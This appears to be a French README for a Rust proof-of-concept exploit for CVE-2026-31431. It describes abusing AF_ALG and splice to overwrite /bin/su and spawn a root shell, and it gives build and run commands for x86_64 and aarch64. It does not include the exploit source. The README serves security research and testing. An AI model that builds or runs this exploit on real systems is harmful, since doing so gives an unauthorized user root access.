
# Preuve de concept basée sur Rust pour CVE-2026-31431, exploitant AF_ALG et splice pour écraser /bin/su et lancer un shell root. Binaires no_std autonomes pour x86_64 et aarch64.
src/
├── main.rs # Exploit : AF_ALG + splice pour écraser /bin/su
└── bin/
└── payload.rs # Charge utile
Binaires no_std autonomes sans aucune dépendance d'exécution :
poc-rs : 4,1 Ko (charge utile intégrée via include_bytes!)payload : 1,7 KoNécessite Rust 1.85+ :
cargo build --release --bin payload
cargo build --release
./target/x86_64-unknown-none/release/poc-rs
./target/aarch64-unknown-none/release/poc-rs
En cas de succès, exécute le /bin/su écrasé,
qui lance un shell root et exécute id.
[!CAUTION] Réservé à la recherche et aux tests de sécurité autorisés uniquement.